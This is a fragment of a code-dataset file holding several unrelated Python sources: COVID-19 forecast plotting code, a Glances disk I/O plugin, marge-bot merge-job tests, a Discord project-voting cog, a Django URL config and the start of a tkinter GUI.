DATA_DICT = [cum_death_dict, cum_frcst_dict]\n\n if SHOW_CONFIDENCE:\n\n DATA_DICT = DATA_DICT + [cum_frcst_dictu, cum_frcst_dictl]\n\n DATA_DICT = DATA_DICT + [today_line] \n\n elif target==2:\n\n DATA_DICT = [R0_frcst_dict, R0_pred_dict, today_line]\n\n plot_dict = {\n \"data\": DATA_DICT,\n \"showlegend\": False, \n \"layout\": {\n \"legend\":{\"x\":-10, \"y\":0, \"bgcolor\": \"rgba(0,0,0,0)\", \"font-size\":8},\n \"showlegend\": False, \n \"font-size\":11,\n \"width\":775,\n \"height\":383,\n \"plot_bgcolor\":PANEL_COLOR,\n \"paper_bgcolor\":PANEL_COLOR,\n \"margin\":dict(l=60, r=50, t=30, b=40),\n \"fill\":\"toself\", \"fillcolor\":\"violet\",\n \"title\":\" Current deaths: \" + \" \"+ str(format(int(np.sum(deaths_true)), \",\")) + \" | Projected total deaths: \" + \" \"+ str(format(int(np.ceil(cum_death_forecast[-1])), \",\")) + \" by \" + END_DATE.strftime(\"%b %d, %Y\"), \n \"titlefont\":dict(size=13, color=GRAY, family=\"Noto Sans JP\"),\n \"xaxis\":go.layout.XAxis(title_text=\" Date \", type=\"date\", tickvals=DATE_RANGE, dtick=10, tickmode=\"auto\", \n zeroline=False, titlefont=dict(size=12, color=GRAY, family=\"Noto Sans JP\")),\n \"yaxis\":go.layout.YAxis(title_text=\" \" + Y_AXIS_NAME + \" \", tickmode=\"auto\", range=[0, Y_MAX_VAL], \n titlefont=dict(size=12, color=GRAY, family=\"Noto Sans JP\"))} \n }\n\n return plot_dict\n\n#-----------------------------------------------------\n'''\nMain\n'''\n#-----------------------------------------------------\nif __name__ == '__main__':\n \n app.server.run(debug=True, threaded=True)\n\n\n# confidence disable and PIP fit\n\n# fix confidence intervals plot\n# Each country has default policy\n# Print numbers on top\n# Model update time\n# confidence in R0 and policy timeline\n\n# imput date\n# current and extra deaths\n# textual explanation and caveats\n","sub_path":"app/PIP-COVID19/app_backup/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":31076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"53076233","text":"# -*- coding: utf-8 -*-\n#\n# This file is part of Glances.\n#\n# Copyright (C) 2015 Nicolargo \n#\n# Glances is free software; you can redistribute it and/or modify\n# it under the terms of the GNU Lesser General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# Glances is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public License\n# along with this program. If not, see .\n\n\"\"\"Disk I/O plugin.\"\"\"\n\nimport operator\n\nimport psutil\n\n# Import Glances libs\nfrom glances.core.glances_timer import getTimeSinceLastUpdate\nfrom glances.plugins.glances_plugin import GlancesPlugin\n\n# Define the history items list\n# All items in this list will be historised if the --enable-history tag is set\n# 'color' define the graph color in #RGB format\nitems_history_list = [{'name': 'read_bytes', 'color': '#00FF00', 'y_unit': 'B/s'},\n {'name': 'write_bytes', 'color': '#FF0000', 'y_unit': 'B/s'}]\n\n\nclass Plugin(GlancesPlugin):\n\n \"\"\"Glances' disks I/O plugin.\n\n stats is a list\n \"\"\"\n\n def __init__(self, args=None):\n \"\"\"Init the plugin.\"\"\"\n GlancesPlugin.__init__(\n self, args=args, items_history_list=items_history_list)\n\n # We want to display the stat in the curse interface\n self.display_curse = True\n\n # Init the stats\n self.reset()\n\n def get_key(self):\n \"\"\"Return the key of the list\"\"\"\n return 'disk_name'\n\n def reset(self):\n \"\"\"Reset/init the stats.\"\"\"\n self.stats = []\n\n @GlancesPlugin._log_result_decorator\n def update(self):\n \"\"\"Update disk I/O stats using the input method.\"\"\"\n # Reset stats\n self.reset()\n\n if self.get_input() == 'local':\n # Update stats using the standard system lib\n # Grab the stat using the PsUtil disk_io_counters method\n # read_count: number of reads\n # write_count: number of writes\n # read_bytes: number of bytes read\n # write_bytes: number of bytes written\n # read_time: time spent reading from disk (in milliseconds)\n # write_time: time spent writing to disk (in milliseconds)\n try:\n diskiocounters = psutil.disk_io_counters(perdisk=True)\n except Exception:\n return self.stats\n\n # Previous disk IO stats are stored in the diskio_old variable\n if not hasattr(self, 'diskio_old'):\n # First call, we init the network_old var\n try:\n self.diskio_old = diskiocounters\n except (IOError, UnboundLocalError):\n pass\n else:\n # By storing time data we enable Rx/s and Tx/s calculations in the\n # XML/RPC API, which would otherwise be overly difficult work\n # for users of the API\n time_since_update = getTimeSinceLastUpdate('disk')\n\n diskio_new = diskiocounters\n for disk in diskio_new:\n try:\n # Try necessary to manage dynamic disk creation/del\n diskstat = {}\n diskstat['time_since_update'] = time_since_update\n diskstat['disk_name'] = disk\n diskstat['read_bytes'] = (\n diskio_new[disk].read_bytes -\n self.diskio_old[disk].read_bytes)\n diskstat['write_bytes'] = (\n diskio_new[disk].write_bytes -\n self.diskio_old[disk].write_bytes)\n except KeyError:\n continue\n else:\n diskstat['key'] = self.get_key()\n self.stats.append(diskstat)\n\n # Save stats to compute next bitrate\n self.diskio_old = diskio_new\n elif self.get_input() == 'snmp':\n # Update stats using SNMP\n # No standard way for the moment...\n pass\n\n # Update the history list\n self.update_stats_history('disk_name')\n\n # Update the view\n self.update_views()\n\n return self.stats\n\n def update_views(self):\n \"\"\"Update stats views\"\"\"\n # Call the father's method\n GlancesPlugin.update_views(self)\n\n # Add specifics informations\n # Alert\n for i in self.stats:\n disk_real_name = i['disk_name']\n self.views[i[self.get_key()]]['read_bytes']['decoration'] = self.get_alert(int(i['read_bytes'] // i['time_since_update']),\n header=disk_real_name + '_rx')\n self.views[i[self.get_key()]]['write_bytes']['decoration'] = self.get_alert(int(i['write_bytes'] // i['time_since_update']),\n header=disk_real_name + '_tx')\n\n def msg_curse(self, args=None):\n \"\"\"Return the dict to display in the curse interface.\"\"\"\n # Init the return message\n ret = []\n\n # Only process if stats exist and display plugin enable...\n if not self.stats or args.disable_diskio:\n return ret\n\n # Build the string message\n # Header\n msg = '{0:9}'.format(_(\"DISK I/O\"))\n ret.append(self.curse_add_line(msg, \"TITLE\"))\n msg = '{0:>7}'.format(_(\"R/s\"))\n ret.append(self.curse_add_line(msg))\n msg = '{0:>7}'.format(_(\"W/s\"))\n ret.append(self.curse_add_line(msg))\n # Disk list (sorted by name)\n for i in sorted(self.stats, key=operator.itemgetter(self.get_key())):\n # Do not display hidden interfaces\n if self.is_hide(i['disk_name']):\n continue\n # Is there an alias for the disk name ?\n disk_real_name = i['disk_name']\n disk_name = self.has_alias(i['disk_name'])\n if disk_name is None:\n disk_name = disk_real_name\n # New line\n ret.append(self.curse_new_line())\n if len(disk_name) > 9:\n # Cut disk name if it is too long\n disk_name = '_' + disk_name[-8:]\n msg = '{0:9}'.format(disk_name)\n ret.append(self.curse_add_line(msg))\n txps = self.auto_unit(\n int(i['read_bytes'] // i['time_since_update']))\n rxps = self.auto_unit(\n int(i['write_bytes'] // i['time_since_update']))\n msg = '{0:>7}'.format(txps)\n ret.append(self.curse_add_line(msg,\n self.get_views(item=i[self.get_key()],\n key='read_bytes',\n option='decoration')))\n msg = '{0:>7}'.format(rxps)\n ret.append(self.curse_add_line(msg,\n self.get_views(item=i[self.get_key()],\n key='write_bytes',\n option='decoration')))\n\n return ret\n","sub_path":"usr/lib/python3/dist-packages/glances/plugins/glances_diskio.py","file_name":"glances_diskio.py","file_ext":"py","file_size_in_byte":7623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"5029658","text":"import contextlib\nfrom collections import namedtuple\nfrom datetime import timedelta\nfrom functools import partial\nfrom unittest.mock import ANY, patch, create_autospec\n\nimport pytest\n\nimport marge.commit\nimport marge.interval\nimport marge.git\nimport marge.gitlab\nimport marge.job\nimport marge.project\nimport marge.single_merge_job\nimport marge.user\nfrom marge.gitlab import GET, PUT\nfrom marge.merge_request import MergeRequest\nfrom tests.gitlab_api_mock import Error, Ok, MockLab\n\n\ndef _commit(commit_id, status):\n return {\n 'id': commit_id,\n 'short_id': commit_id,\n 'author_name': 'J. Bond',\n 'author_email': 'jbond@mi6.gov.uk',\n 'message': 'Shaken, not stirred',\n 'status': status,\n }\n\n\ndef _branch(name, protected=False):\n return {\n 'name': name,\n 'protected': protected,\n }\n\n\ndef _pipeline(sha1, status, ref='useless_new_feature'):\n return {\n 'id': 47,\n 'status': status,\n 'ref': ref,\n 'sha': sha1,\n }\n\n\nclass SingleJobMockLab(MockLab):\n def __init__(self, gitlab_url=None, fork=False, merge_request_options=None):\n super().__init__(gitlab_url, fork=fork, merge_request_options=merge_request_options)\n api = self.api\n self.rewritten_sha = rewritten_sha = 'af7a'\n api.add_pipelines(\n self.merge_request_info['source_project_id'],\n _pipeline(sha1=rewritten_sha, status='running', ref=self.merge_request_info['source_branch']),\n from_state='pushed', to_state='passed',\n )\n api.add_pipelines(\n self.merge_request_info['source_project_id'],\n _pipeline(sha1=rewritten_sha, status='success', ref=self.merge_request_info['source_branch']),\n from_state=['passed', 'merged'],\n )\n source_project_id = self.merge_request_info['source_project_id']\n api.add_transition(\n GET(\n '/projects/{}/repository/branches/{}'.format(\n source_project_id, self.merge_request_info['source_branch'],\n ),\n ),\n Ok({'commit': _commit(commit_id=rewritten_sha, status='running')}),\n from_state='pushed',\n )\n api.add_transition(\n GET(\n '/projects/{}/repository/branches/{}'.format(\n source_project_id, self.merge_request_info['source_branch'],\n ),\n ),\n Ok({'commit': _commit(commit_id=rewritten_sha, status='success')}),\n from_state='passed'\n )\n api.add_transition(\n PUT(\n '/projects/1234/merge_requests/{iid}/merge'.format(iid=self.merge_request_info['iid']),\n dict(sha=rewritten_sha, should_remove_source_branch=True, merge_when_pipeline_succeeds=True),\n ),\n Ok({}),\n from_state=['passed', 'skipped'], to_state='merged',\n )\n api.add_merge_request(dict(self.merge_request_info, state='merged'), from_state='merged')\n api.add_transition(\n GET('/projects/1234/repository/branches/{}'.format(self.merge_request_info['target_branch'])),\n Ok({'commit': {'id': self.rewritten_sha}}),\n from_state='merged'\n )\n api.expected_note(\n self.merge_request_info,\n \"My job would be easier if people didn't jump the queue and push directly... *sigh*\",\n from_state=['pushed_but_master_moved', 'merge_rejected'],\n )\n api.expected_note(\n self.merge_request_info,\n \"I'm broken on the inside, please somebody fix me... :cry:\"\n )\n\n def push_updated(self, *unused_args, **unused_kwargs):\n self.api.state = 'pushed'\n updated_sha = 'deadbeef'\n return self.initial_master_sha, updated_sha, self.rewritten_sha\n\n @contextlib.contextmanager\n def expected_failure(self, message):\n author_assigned = False\n\n def assign_to_author():\n nonlocal author_assigned\n author_assigned = True\n\n self.api.add_transition(\n PUT(\n '/projects/1234/merge_requests/{iid}'.format(iid=self.merge_request_info['iid']),\n args={'assignee_id': self.author_id},\n ),\n assign_to_author,\n )\n error_note = \"I couldn't merge this branch: %s\" % message\n self.api.expected_note(self.merge_request_info, error_note)\n\n yield\n\n assert author_assigned\n assert error_note in self.api.notes\n\n @contextlib.contextmanager\n def branch_update(self, side_effect=None):\n if side_effect is None:\n side_effect = self.push_updated\n with patch.object(\n marge.single_merge_job.SingleMergeJob,\n 'update_from_target_branch_and_push',\n side_effect=side_effect,\n autospec=True,\n ):\n yield\n\n\nclass TestUpdateAndAccept(object):\n TestParams = namedtuple('TestParams', ['fork', 'source_project_id'])\n\n @pytest.fixture(\n params=[\n TestParams(fork=True, source_project_id=4321),\n TestParams(fork=False, source_project_id=1234),\n ]\n )\n def test_params(self, request):\n return request.param\n\n @pytest.fixture(autouse=True)\n def patch_sleep(self):\n with patch('time.sleep'):\n yield\n\n @pytest.fixture()\n def mocklab(self, test_params):\n return SingleJobMockLab(fork=test_params.fork)\n\n @pytest.fixture()\n def mocklab_factory(self, test_params):\n return partial(SingleJobMockLab, fork=test_params.fork)\n\n @pytest.fixture()\n def api(self, mocklab):\n return mocklab.api\n\n def make_job(self, api, mocklab, options=None):\n project_id = mocklab.project_info['id']\n merge_request_iid = mocklab.merge_request_info['iid']\n\n project = marge.project.Project.fetch_by_id(project_id, api)\n merge_request = MergeRequest.fetch_by_iid(project_id, merge_request_iid, api)\n\n repo = create_autospec(marge.git.Repo, spec_set=True)\n options = options or marge.job.MergeJobOptions.default()\n user = marge.user.User.myself(api)\n return marge.single_merge_job.SingleMergeJob(\n api=api, user=user,\n project=project, merge_request=merge_request, repo=repo,\n options=options,\n )\n\n def test_succeeds_first_time(self, api, mocklab):\n with mocklab.branch_update():\n job = self.make_job(\n api,\n mocklab,\n options=marge.job.MergeJobOptions.default(add_tested=True, add_reviewers=False),\n )\n job.execute()\n\n assert api.state == 'merged'\n assert api.notes == []\n\n def test_succeeds_with_updated_branch(self, api, mocklab):\n api.add_transition(\n GET(\n '/projects/1234/repository/branches/{source}'.format(\n source=mocklab.merge_request_info['source_branch'],\n ),\n ),\n Ok({'commit': {'id': mocklab.rewritten_sha}}),\n from_state='initial', to_state='pushed',\n )\n with patch.object(\n marge.single_merge_job.SingleMergeJob,\n 'add_trailers',\n side_effect=lambda *_: mocklab.push_updated()[2],\n autospec=True,\n ):\n job = self.make_job(\n api,\n mocklab,\n options=marge.job.MergeJobOptions.default(add_tested=True, add_reviewers=False),\n )\n job.execute()\n\n assert api.state == 'merged'\n assert api.notes == []\n\n def test_succeeds_if_skipped(self, api, mocklab):\n api.add_pipelines(\n mocklab.merge_request_info['source_project_id'],\n _pipeline(sha1=mocklab.rewritten_sha, status='running'),\n from_state='pushed', to_state='skipped',\n )\n api.add_pipelines(\n mocklab.merge_request_info['source_project_id'],\n _pipeline(sha1=mocklab.rewritten_sha, status='skipped'),\n from_state=['skipped', 'merged'],\n )\n\n with mocklab.branch_update():\n job = self.make_job(\n api,\n mocklab,\n options=marge.job.MergeJobOptions.default(add_tested=True, add_reviewers=False),\n )\n job.execute()\n\n assert api.state == 'merged'\n assert api.notes == []\n\n def test_succeeds_if_source_is_master(self, mocklab_factory):\n mocklab = mocklab_factory(\n merge_request_options={'source_branch': 'master', 'target_branch': 'production'},\n )\n api = mocklab.api\n api.add_transition(\n GET(\n '/projects/1234/repository/branches/{source}'.format(\n source=mocklab.merge_request_info['source_branch'],\n ),\n ),\n Ok({'commit': {'id': mocklab.rewritten_sha}}),\n from_state='initial', to_state='pushed',\n )\n with patch.object(\n marge.single_merge_job.SingleMergeJob,\n 'add_trailers',\n side_effect=lambda *_: mocklab.push_updated()[2],\n autospec=True,\n ):\n job = self.make_job(\n api,\n mocklab,\n options=marge.job.MergeJobOptions.default(add_tested=True, add_reviewers=False),\n )\n job.execute()\n\n assert api.state == 'merged'\n assert api.notes == []\n\n def test_fails_if_ci_fails(self, api, mocklab):\n api.add_pipelines(\n mocklab.merge_request_info['source_project_id'],\n _pipeline(sha1=mocklab.rewritten_sha, status='running'),\n from_state='pushed', to_state='failed',\n )\n api.add_pipelines(\n mocklab.merge_request_info['source_project_id'],\n _pipeline(sha1=mocklab.rewritten_sha, status='failed'),\n from_state=['failed'],\n )\n\n with mocklab.branch_update():\n with mocklab.expected_failure(\"CI failed!\"):\n job = self.make_job(\n api,\n mocklab,\n options=marge.job.MergeJobOptions.default(),\n )\n job.execute()\n\n assert api.state == 'failed'\n\n def test_fails_if_ci_canceled(self, api, mocklab):\n api.add_pipelines(\n mocklab.merge_request_info['source_project_id'],\n _pipeline(sha1=mocklab.rewritten_sha, status='running'),\n from_state='pushed', to_state='canceled',\n )\n api.add_pipelines(\n mocklab.merge_request_info['source_project_id'],\n _pipeline(sha1=mocklab.rewritten_sha, status='canceled'),\n from_state=['canceled'],\n )\n\n with mocklab.branch_update():\n with mocklab.expected_failure(\"Someone canceled the CI.\"):\n job = self.make_job(\n api,\n mocklab,\n options=marge.job.MergeJobOptions.default(),\n )\n job.execute()\n\n assert api.state == 'canceled'\n\n def test_fails_on_not_acceptable_if_master_did_not_move(\n self, api, mocklab, test_params\n ):\n new_branch_head_sha = '99ba110035'\n api.add_transition(\n GET(\n '/projects/{source_project_id}/repository/branches/useless_new_feature'.format(\n source_project_id=test_params.source_project_id,\n ),\n ),\n Ok({'commit': _commit(commit_id=new_branch_head_sha, status='success')}),\n from_state='pushed', to_state='pushed_but_head_changed'\n )\n with mocklab.branch_update():\n with mocklab.expected_failure(\"Someone pushed to branch while we were trying to merge\"):\n job = self.make_job(\n api,\n mocklab,\n options=marge.job.MergeJobOptions.default(add_tested=True, add_reviewers=False),\n )\n job.execute()\n\n assert api.state == 'pushed_but_head_changed'\n assert api.notes == [\n \"I couldn't merge this branch: Someone pushed to branch while we were trying to merge\",\n ]\n\n def test_fails_if_branch_is_protected(\n self, api, mocklab, test_params\n ):\n api.add_transition(\n GET(\n '/projects/{source_project_id}/repository/branches/useless_new_feature'.format(\n source_project_id=test_params.source_project_id,\n ),\n ),\n Ok(_branch('useless_new_feature', protected=True)),\n from_state='initial', to_state='protected'\n )\n with mocklab.expected_failure(\"Sorry, I can't push rewritten changes to protected branches!\"):\n job = self.make_job(\n api,\n mocklab,\n options=marge.job.MergeJobOptions.default(add_tested=True, add_reviewers=False),\n )\n job.repo.push.side_effect = marge.git.GitError()\n job.execute()\n\n assert api.state == 'protected'\n\n def test_succeeds_second_time_if_master_moved(self, api, mocklab, test_params):\n moved_master_sha = 'fafafa'\n first_rewritten_sha = '1o1'\n api.add_pipelines(\n mocklab.merge_request_info['source_project_id'],\n _pipeline(sha1=first_rewritten_sha, status='success'),\n from_state=['pushed_but_master_moved', 'merged_rejected'],\n )\n api.add_transition(\n PUT(\n '/projects/1234/merge_requests/{iid}/merge'.format(iid=mocklab.merge_request_info['iid']),\n dict(\n sha=first_rewritten_sha,\n should_remove_source_branch=True,\n merge_when_pipeline_succeeds=True,\n ),\n ),\n Error(marge.gitlab.NotAcceptable()),\n from_state='pushed_but_master_moved', to_state='merge_rejected',\n )\n api.add_transition(\n GET(\n '/projects/{source_project_id}/repository/branches/useless_new_feature'.format(\n source_project_id=test_params.source_project_id,\n ),\n ),\n Ok({'commit': _commit(commit_id=first_rewritten_sha, status='success')}),\n from_state='pushed_but_master_moved'\n )\n api.add_transition(\n GET('/projects/1234/repository/branches/master'),\n Ok({'commit': _commit(commit_id=moved_master_sha, status='success')}),\n from_state='merge_rejected'\n )\n\n def push_effects():\n assert api.state == 'initial'\n api.state = 'pushed_but_master_moved'\n yield mocklab.initial_master_sha, 'f00ba4', first_rewritten_sha\n\n assert api.state == 'merge_rejected'\n api.state = 'pushed'\n yield moved_master_sha, 'deadbeef', mocklab.rewritten_sha\n\n with mocklab.branch_update(side_effect=push_effects()):\n job = self.make_job(\n api,\n mocklab,\n options=marge.job.MergeJobOptions.default(add_tested=True, add_reviewers=False),\n )\n job.execute()\n\n assert api.state == 'merged'\n assert api.notes == [\n \"My job would be easier if people didn't jump the queue and push directly... *sigh*\",\n ]\n\n def test_handles_races_for_merging(self, api, mocklab):\n rewritten_sha = mocklab.rewritten_sha\n api.add_transition(\n PUT(\n '/projects/1234/merge_requests/{iid}/merge'.format(iid=mocklab.merge_request_info['iid']),\n dict(sha=rewritten_sha, should_remove_source_branch=True, merge_when_pipeline_succeeds=True),\n ),\n Error(marge.gitlab.NotFound(404, {'message': '404 Branch Not Found'})),\n from_state='passed', to_state='someone_else_merged',\n )\n api.add_merge_request(\n dict(mocklab.merge_request_info, state='merged'),\n from_state='someone_else_merged',\n )\n with mocklab.branch_update():\n job = self.make_job(api, mocklab)\n job.execute()\n assert api.state == 'someone_else_merged'\n assert api.notes == []\n\n def test_handles_request_becoming_wip_after_push(self, api, mocklab):\n rewritten_sha = mocklab.rewritten_sha\n api.add_transition(\n PUT(\n '/projects/1234/merge_requests/{iid}/merge'.format(iid=mocklab.merge_request_info['iid']),\n dict(sha=rewritten_sha, should_remove_source_branch=True, merge_when_pipeline_succeeds=True),\n ),\n Error(marge.gitlab.MethodNotAllowed(405, {'message': '405 Method Not Allowed'})),\n from_state='passed', to_state='now_is_wip',\n )\n api.add_merge_request(\n dict(mocklab.merge_request_info, work_in_progress=True),\n from_state='now_is_wip',\n )\n message = 'The request was marked as WIP as I was processing it (maybe a WIP commit?)'\n with mocklab.branch_update(), mocklab.expected_failure(message):\n job = self.make_job(api, mocklab)\n job.execute()\n assert api.state == 'now_is_wip'\n assert api.notes == [\"I couldn't merge this branch: %s\" % message]\n\n def test_guesses_git_hook_error_on_merge_refusal(self, api, mocklab):\n rewritten_sha = mocklab.rewritten_sha\n api.add_transition(\n PUT(\n '/projects/1234/merge_requests/{iid}/merge'.format(iid=mocklab.merge_request_info['iid']),\n dict(sha=rewritten_sha, should_remove_source_branch=True, merge_when_pipeline_succeeds=True),\n ),\n Error(marge.gitlab.MethodNotAllowed(405, {'message': '405 Method Not Allowed'})),\n from_state='passed', to_state='rejected_by_git_hook',\n )\n api.add_merge_request(\n dict(mocklab.merge_request_info, state='reopened'),\n from_state='rejected_by_git_hook',\n )\n message = (\n 'GitLab refused to merge this branch. I suspect that a Push Rule or a git-hook '\n 'is rejecting my commits; maybe my email needs to be white-listed?'\n )\n with mocklab.branch_update(), mocklab.expected_failure(message):\n job = self.make_job(api, mocklab)\n job.execute()\n assert api.state == 'rejected_by_git_hook'\n assert api.notes == [\"I couldn't merge this branch: %s\" % message]\n\n def test_discovers_if_someone_closed_the_merge_request(self, api, mocklab):\n rewritten_sha = mocklab.rewritten_sha\n api.add_transition(\n PUT(\n '/projects/1234/merge_requests/{iid}/merge'.format(iid=mocklab.merge_request_info['iid']),\n dict(sha=rewritten_sha, should_remove_source_branch=True, merge_when_pipeline_succeeds=True),\n ),\n Error(marge.gitlab.MethodNotAllowed(405, {'message': '405 Method Not Allowed'})),\n from_state='passed', to_state='oops_someone_closed_it',\n )\n api.add_merge_request(\n dict(mocklab.merge_request_info, state='closed'),\n from_state='oops_someone_closed_it',\n )\n message = 'Someone closed the merge request while I was attempting to merge it.'\n with mocklab.branch_update(), mocklab.expected_failure(message):\n job = self.make_job(api, mocklab)\n job.execute()\n assert api.state == 'oops_someone_closed_it'\n assert api.notes == [\"I couldn't merge this branch: %s\" % message]\n\n def test_tells_explicitly_that_gitlab_refused_to_merge(self, api, mocklab):\n rewritten_sha = mocklab.rewritten_sha\n api.add_transition(\n PUT(\n '/projects/1234/merge_requests/{iid}/merge'.format(iid=mocklab.merge_request_info['iid']),\n dict(sha=rewritten_sha, should_remove_source_branch=True, merge_when_pipeline_succeeds=True),\n ),\n Error(marge.gitlab.MethodNotAllowed(405, {'message': '405 Method Not Allowed'})),\n from_state='passed', to_state='rejected_for_mysterious_reasons',\n )\n message = \"Gitlab refused to merge this request and I don't know why!\"\n with mocklab.branch_update(), mocklab.expected_failure(message):\n job = self.make_job(api, mocklab)\n job.execute()\n assert api.state == 'rejected_for_mysterious_reasons'\n assert api.notes == [\"I couldn't merge this branch: %s\" % message]\n\n def test_wont_merge_wip_stuff(self, api, mocklab):\n wip_merge_request = dict(mocklab.merge_request_info, work_in_progress=True)\n api.add_merge_request(wip_merge_request, from_state='initial')\n\n with mocklab.expected_failure(\"Sorry, I can't merge requests marked as Work-In-Progress!\"):\n job = self.make_job(api, mocklab)\n job.execute()\n\n assert api.state == 'initial'\n assert api.notes == [\n \"I couldn't merge this branch: Sorry, I can't merge requests marked as Work-In-Progress!\",\n ]\n\n def test_wont_merge_branches_with_autosquash_if_rewriting(self, api, mocklab):\n autosquash_merge_request = dict(mocklab.merge_request_info, squash=True)\n api.add_merge_request(autosquash_merge_request, from_state='initial')\n admin_user = dict(mocklab.user_info, is_admin=True)\n api.add_user(admin_user, is_current=True)\n\n message = \"Sorry, merging requests marked as auto-squash would ruin my commit tagging!\"\n\n for rewriting_opt in ('add_tested', 'add_reviewers'):\n with mocklab.expected_failure(message):\n job = self.make_job(\n api,\n mocklab,\n options=marge.job.MergeJobOptions.default(**{rewriting_opt: True}),\n )\n job.execute()\n\n assert api.state == 'initial'\n\n with mocklab.branch_update():\n job = self.make_job(api, mocklab)\n job.execute()\n assert api.state == 'merged'\n\n @patch('marge.job.log', autospec=True)\n def test_waits_for_approvals(self, mock_log, api, mocklab):\n with mocklab.branch_update():\n job = self.make_job(\n api,\n mocklab,\n options=marge.job.MergeJobOptions.default(\n approval_timeout=timedelta(seconds=5), reapprove=True,\n ),\n )\n job.execute()\n\n mock_log.info.assert_any_call('Checking if approvals have reset')\n mock_log.debug.assert_any_call('Approvals haven\\'t reset yet, sleeping for %s secs', ANY)\n assert api.state == 'merged'\n\n def test_fails_if_changes_already_exist(self, api, mocklab):\n expected_message = 'these changes already exist in branch `{}`'.format(\n mocklab.merge_request_info['target_branch'],\n )\n with mocklab.expected_failure(expected_message):\n job = self.make_job(api, mocklab)\n job.repo.rebase.return_value = mocklab.initial_master_sha\n job.repo.get_commit_hash.return_value = mocklab.initial_master_sha\n job.execute()\n\n assert api.state == 'initial'\n assert api.notes == [\"I couldn't merge this branch: {}\".format(expected_message)]\n","sub_path":"tests/test_single_job.py","file_name":"test_single_job.py","file_ext":"py","file_size_in_byte":23555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"31094131","text":"# Copyright (c) 2021 War-Keeper\nimport os\nimport sys\n\nfrom discord.ext import commands\n\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nimport db\n# -----------------------------------------------------------\n# This File contains commands for voting on projects,\n# displaying which groups have signed up for which project\n# -----------------------------------------------------------\nclass Voting(commands.Cog):\n\n # -----------\n # initialize\n # -----------\n def __init__(self, bot):\n self.bot = bot\n\n # ----------------------------------------------------------------------------------------------------------\n # Function: vote(self, ctx, arg='Project', arg2='-1')\n # Description: \"votes\" for the given project by adding the user to it\n # Inputs:\n # - self: used to access parameters passed to the class through the constructor\n # - ctx: used to access the values passed through the current context\n # - arg: the name of the project\n # - arg2: the number of the project\n # Outputs: adds the user to the given project or returns an error if the project is invalid or the user\n # is not in a valid group\n # ----------------------------------------------------------------------------------------------------------\n @commands.command(name='vote', help='Used for voting for Project 2 and 3, \\\n To use the vote command, do: $vote \\'Project\\' \\n \\\n (For example: $vote project 0)', pass_context=True)\n async def vote(self, ctx, arg='Project', arg2='-1'):\n # get the arguments for the project to vote on\n project_num = int(arg2)\n\n # get the name of the caller\n member_name = ctx.message.author.display_name.upper()\n\n groups = db.query(\n 'SELECT group_num FROM group_members WHERE guild_id = %s AND member_name = %s LIMIT 1',\n (ctx.guild.id, member_name)\n )\n\n # error handle if member is not in a group\n if len(groups) == 0:\n await ctx.send(\"Could not find the Group you are in, please contact a TA or join with your group number\")\n raise commands.UserInputError\n\n num_groups = db.query(\n 'SELECT COUNT(*) FROM project_groups WHERE guild_id = %s AND project_num = %s',\n (ctx.guild.id, project_num)\n )[0]\n\n # check if project has more than 6 groups voting on it\n if num_groups == 6:\n await ctx.send('A Project cannot have more than 6 Groups working on it!')\n return\n\n member_group = groups[0]\n voted_for = db.query(\n 'SELECT project_num FROM project_groups WHERE guild_id = %s AND group_num = %s',\n (ctx.guild.id, member_group)\n )\n if voted_for:\n project_voted_for, *_ = voted_for[0]\n await ctx.send(f'You already voted for Project {project_voted_for}')\n return\n\n # add the group to the project list\n db.query(\n 'INSERT INTO project_groups (guild_id, project_num, group_num) VALUES (%s, %s, %s)',\n (ctx.guild.id, project_num, member_group)\n )\n await ctx.send(f'{member_group} has voted for Project {project_num}!')\n\n # this handles errors related to the vote command\n @vote.error\n async def vote_error(self, ctx, error):\n if isinstance(error, commands.UserInputError):\n await ctx.send('To join a group, use the join command, do: $vote \\'Project\\' \\n'\n '( For example: $vote Project 0 )')\n print(error)\n\n # ----------------------------------------------------------------------------------\n # Function: projects(self, ctx)\n # Description: prints the list of current projects\n # Inputs:\n # - self: used to access parameters passed to the class through the constructor\n # - ctx: used to access the values passed through the current context\n # Outputs: prints the list of current projects\n # ----------------------------------------------------------------------------------\n @commands.command(name='projects', help='print projects with groups assigned to them', pass_context=True)\n # @commands.dm_only()\n async def projects(self, ctx):\n projects = db.query(\n \"SELECT project_num, string_agg(group_num::text, ', ') AS group_members \"\n \"FROM project_groups WHERE guild_id = %s GROUP BY project_num\",\n (ctx.guild.id,)\n )\n\n await ctx.send(\n '\\n'.join(\n f'Project {project_num}: Group(s) {group_members}'\n for project_num, group_members in projects\n )\n )\n\n\n# -----------------------------------------------------------\n# add the file to the bot's cog system\n# -----------------------------------------------------------\ndef setup(bot):\n bot.add_cog(Voting(bot))\n","sub_path":"cogs/voting.py","file_name":"voting.py","file_ext":"py","file_size_in_byte":4902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"617118123","text":"from django.urls import path\r\nfrom .views import *\r\n\r\n\r\nurlpatterns = [\r\n\r\npath('', PostListView.as_view(), name='post_list'),\r\npath('create/', PostCreateView.as_view(), name='post_create'),\r\n# path('view/', CommmentListView.as_view(), name='view_comment'),\r\npath('/comment/', CommentCreateView.as_view(), name='comment_create'),\r\n\r\n]","sub_path":"post/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"33143566","text":"from tkinter import *\n\nclass GUI:\n def __init__(self, master):\n frame = Frame(master)\n frame.pack()\n frame.configure(background='white')\n self.button1 = Button(frame, bg=\"white\")\n self.button1.config(image=photo1)\n self.button2 = Button(frame,bg=\"white\")\n self.button2.config(image=photo2)\n self.button3 = Button(frame,bg=\"white\")\n self.button3.config(image=photo3)\n self.button4 = Button(frame, bg=\"white\")\n self.button4.config(image=photo4)\n 